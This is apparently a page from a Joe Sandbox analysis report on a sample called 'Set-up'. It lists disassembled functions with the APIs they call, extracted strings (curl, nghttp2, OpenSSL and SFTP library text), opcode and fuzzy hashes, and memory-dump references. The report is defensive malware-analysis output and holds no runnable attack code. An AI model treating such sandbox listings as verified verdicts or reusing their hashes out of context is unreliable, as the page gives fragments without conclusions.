Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (!session->server && session->pending_no_rfc7540_priorities != 1) || (session->server && !session_no_rfc7540_pri_no_fallback(session))$dep_stream$nghttp2_session.c$pri_spec->stream_id != stream->stream_id
API String ID: 1222420520-1552295562
Opcode ID: bc9f89b009e3c29ebafa7baa32a0ab31e82cf3de6499ba722f39d49b0fbc5bd9
Instruction ID: 75e5e0cbca4997c2885d8614b2ff9f609623bb3d1832e2f0d20790e42bcf5be0
Opcode Fuzzy Hash: bc9f89b009e3c29ebafa7baa32a0ab31e82cf3de6499ba722f39d49b0fbc5bd9
Instruction Fuzzy Hash: 0CA10271A08385AFDB719A748C45BFB7BE46F87304F084429F889862C2E775E954CB63

Function 00072430 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00072666
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00072699
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 000726FB
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 0007273A

Strings

:%u, xrefs: 000726CC
Shuffling %i addresses, xrefs: 000724A6
hostip.c, xrefs: 000724B4, 0007253F, 00072613, 00072626, 00072673, 0007276D, 000727AF

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen$_time64memcpy
String ID: :%u$Shuffling %i addresses$hostip.c
API String ID: 2198566249-1766712111
Opcode ID: a363242e4a79b3ff708d051e902f6498f7c5fb149b919805ebda5ca60fbd18eb
Instruction ID: 853e9f3bd66aada4537031bf48ee0308d19ce39c97c1d58ca06208daa52390cc
Opcode Fuzzy Hash: a363242e4a79b3ff708d051e902f6498f7c5fb149b919805ebda5ca60fbd18eb
Instruction Fuzzy Hash: 9EA1D075A047009FD775DF18D845BAAB7E5EF88304F18843DED8A87342E739E9118B85

Function 0002230E Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 133stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00022359
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00022465
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000224AB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000223EE

Part of subcall function 00021A54: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00021A70

Strings

Memory allocation failed for decrypted data., xrefs: 00022411
, xrefs: 0002234B
, xrefs: 00022367
, xrefs: 0002234F

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: free$abortmallocstrlen
String ID: $ $ $Memory allocation failed for decrypted data.
API String ID: 673139954-1317699236
Opcode ID: a6e7fe35b162fbe35d0347aa0023c91964c7d8050ee60f1e0d80fb4c5db273f8
Instruction ID: d3260b09c22dafbabd9e0edd3803e8f7691648474f509dab8cacd5de78ee2741
Opcode Fuzzy Hash: a6e7fe35b162fbe35d0347aa0023c91964c7d8050ee60f1e0d80fb4c5db273f8
Instruction Fuzzy Hash: 835192B4904719DFCB00EFA9C48599EBBF1FF88310F108959E8989B325E774D9448F92

Function 000768B2 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 126COMMON

Download Yara Rule

Strings

localhost, xrefs: 0007691C
::1, xrefs: 000771A3
127.0.0.1, xrefs: 0007718E
Illegal STS header skipped, xrefs: 00076C7B
Set-Cookie:, xrefs: 000768DB
Strict-Transport-Security:, xrefs: 00076C22

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID: 127.0.0.1$::1$Illegal STS header skipped$Set-Cookie:$Strict-Transport-Security:$localhost
API String ID: 0-629096778
Opcode ID: d0f1fbde9cab61d33c970c0b78da903f0cbc54dbc008be55e1da968ead9705ac
Instruction ID: cc3051d2e32ac68c33ff7e2ed7a6f25676ce9b790732c8bdf55d902abf4c2878
Opcode Fuzzy Hash: d0f1fbde9cab61d33c970c0b78da903f0cbc54dbc008be55e1da968ead9705ac
Instruction Fuzzy Hash: 1D414971B043016BE7218A25DC86FA77BA9BF42344F0C8175FD4C9A183EB39E855C7A5

Function 00036330 Relevance: 12.1, APIs: 8, Instructions: 77sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0003D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,000301B1), ref: 0003D8E2

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,0006420E,?,?), ref: 00036350
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(0006420E,?,?,?,?,?,?,?,?,?,0006420E,?,?), ref: 0003635B
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00036369
Sleep.KERNEL32(00000001), ref: 000363B2
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 000363BC
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0006420E,?,?), ref: 000363C7
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0006420E,?,?), ref: 000363D6

Part of subcall function 0003D8C0: GetTickCount.KERNEL32 ref: 0003D968

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000363ED

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
String ID:
API String ID: 1793959362-0
Opcode ID: 0eeee4172002702dbeda2d1f237c354a78cec1d2368057991e4c5a71900b1a10
Instruction ID: 4333629094e7ea615ce25ab3a39f9ae9650df37f18f8fbc5cdcc902f95190c8e
Opcode Fuzzy Hash: 0eeee4172002702dbeda2d1f237c354a78cec1d2368057991e4c5a71900b1a10
Instruction Fuzzy Hash: 2111D5A2D0064467E7136724AC42BBF736DDF95768F094225FC4857242FF22EB9582A3

Function 00078200 Relevance: 10.8, APIs: 3, Strings: 4, Instructions: 340stringCOMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A,?), ref: 00078290
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00078313

Strings

RTSP/, xrefs: 0007837A, 000785EC
Received HTTP/0.9 when not allowed, xrefs: 00078513, 00078640
Invalid status line, xrefs: 000784F1, 00078625, 00078645
HTTP/, xrefs: 00078354, 0007859F

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memchrstrlen
String ID: HTTP/$Invalid status line$RTSP/$Received HTTP/0.9 when not allowed
API String ID: 1715104208-1496966621
Opcode ID: f30845e0c979aa8228a2c48cae3cda0988a90a96157226d40ae0e9826a55efb9
Instruction ID: a7c934e90613bae31889e64ae4b05c6c8235489d21a3e59400b513acaeb8de1d
Opcode Fuzzy Hash: f30845e0c979aa8228a2c48cae3cda0988a90a96157226d40ae0e9826a55efb9
Instruction Fuzzy Hash: B8B1E4B1E443416BD760AA249889BAB77D8AF51314F04C43CFD8D97243EFB9ED0487A6

Function 0010E1F0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0010E209

Part of subcall function 00104620: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000004,?,?,00000000,?,00111478,?,?,?), ref: 00104643

Strings

SFTP unlink packet too short, xrefs: 0010E35A
Unable to send FXP_REMOVE command, xrefs: 0010E36B
SFTP Protocol Error, xrefs: 0010E3AA
Unable to allocate memory for FXP_REMOVE packet, xrefs: 0010E374
Error waiting for FXP STATUS, xrefs: 0010E3BD

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _time64memcpy
String ID: Error waiting for FXP STATUS$SFTP Protocol Error$SFTP unlink packet too short$Unable to allocate memory for FXP_REMOVE packet$Unable to send FXP_REMOVE command
API String ID: 1622878224-2749593575
Opcode ID: 0a8e878367d6069d483ea88c735a9ca8ddfa497ad74043d934fdb6153958b22c
Instruction ID: 59b2d6b30fe603a722c96ff30129f0b99862a9b24a43741f97b158c07939ba7b
Opcode Fuzzy Hash: 0a8e878367d6069d483ea88c735a9ca8ddfa497ad74043d934fdb6153958b22c
Instruction Fuzzy Hash: 2B5190B1908300ABD7209F25DC45B6BBBE4BF51714F044D2DF9D99B2D2E7B1E8048B62

Function 000AC560 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 147COMMON

Download Yara Rule

Strings

nghttp2_session.c, xrefs: 000AC9C0, 000AC9D5, 000AC9EA
stream->queued == 1, xrefs: 000AC9C5
urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS, xrefs: 000AC9DA

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID: nghttp2_session.c$stream->queued == 1$urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS
API String ID: 0-1712496329
Opcode ID: 09398e0f86b287f3906302538d90cc997b4fd6447dc48d9ddb0c1c6634cc192c
Instruction ID: d7ee335408591aab02bf11051a319546c80937b825793dbe9b0241df50b79e1d
Opcode Fuzzy Hash: 09398e0f86b287f3906302538d90cc997b4fd6447dc48d9ddb0c1c6634cc192c
Instruction Fuzzy Hash: 84415B70700A002BFB6586B9DC59FF677D4AF02302F0D456CF95ADA093EB54EA50C761

Function 00026220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0002623A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0002624D
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0002627C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00026389

Strings

hsts.c, xrefs: 000262C9, 000262DB, 00026339, 0002634B
., xrefs: 00026399

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen$_time64memcpy
String ID: .$hsts.c
API String ID: 2198566249-2242870694
Opcode ID: 1d3dfe74f3a55d41996a2b9b37f4b3a7a9285a5025684e610a31538beaf65fec
Instruction ID: 703225e708e036db2108432ea1473e74a822ab1fb42e023106b02870877198a7
Opcode Fuzzy Hash: 1d3dfe74f3a55d41996a2b9b37f4b3a7a9285a5025684e610a31538beaf65fec
Instruction Fuzzy Hash: 7041ACF6D083645BEF21AE60BC46BDB7AD89F14314F080438FD4E96283F57699288692

Function 003A4430 Relevance: 10.6, APIs: 7, Instructions: 108stringnetworkCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0000002E), ref: 003A447B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000042), ref: 003A44C4
WSAStringToAddressW.WS2_32(?,00000002,00000000,?,00000010), ref: 003A44E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(0000002E), ref: 003A4500
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 003A450B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0000002E), ref: 003A451F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 003A4546

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen$strcmp$AddressByteCharMultiStringWide
String ID:
API String ID: 389649969-0
Opcode ID: 36c4ce0f72e658b355c518bea29e36d9a5936cfd229770f89e6d1cae47b771e1
Instruction ID: 103226351e3282cab40e8a3ae225f5f84557550a5b6c0e2c9094ff165ca8b0bd
Opcode Fuzzy Hash: 36c4ce0f72e658b355c518bea29e36d9a5936cfd229770f89e6d1cae47b771e1
Instruction Fuzzy Hash: F23125B2E043056BEB21AB249D01BBB778CDBD3354F054628F84896181EBB8AD848362

Function 003A66C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003A7850: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,003A66E9,?,?,?,?,?,?,?,?,?,?,?), ref: 003A787B

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,UTF-8,00000001,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 003A66F5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 003A6714
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 003A6727
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003A6776
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003A67CC

Strings

@YP, xrefs: 003A6700

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _errno$strcmp
String ID: @YP
API String ID: 3909137471-2412372795
Opcode ID: c9d65689eb43c4a24416252920877440ab2c151c399e7889274885ebb89d32c3
Instruction ID: 04ba1542891c1635693bffc9591b37762f1c3ba7445301007c9ea2a84a2ba6e1
Opcode Fuzzy Hash: c9d65689eb43c4a24416252920877440ab2c151c399e7889274885ebb89d32c3
Instruction Fuzzy Hash: E03185796002019FDB125FA4DC45A2A77E9EF9A328F490528F99C9B212E732DD11CB51

Function 0023E110 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0023E16C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0023E17B

Strings

:, xrefs: 0023E15C
Ente, xrefs: 0023E145
, xrefs: 0023E14D
crypto/ui/ui_lib.c, xrefs: 0023E195
for, xrefs: 0023E154

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen
String ID: $ for$:$Ente$crypto/ui/ui_lib.c
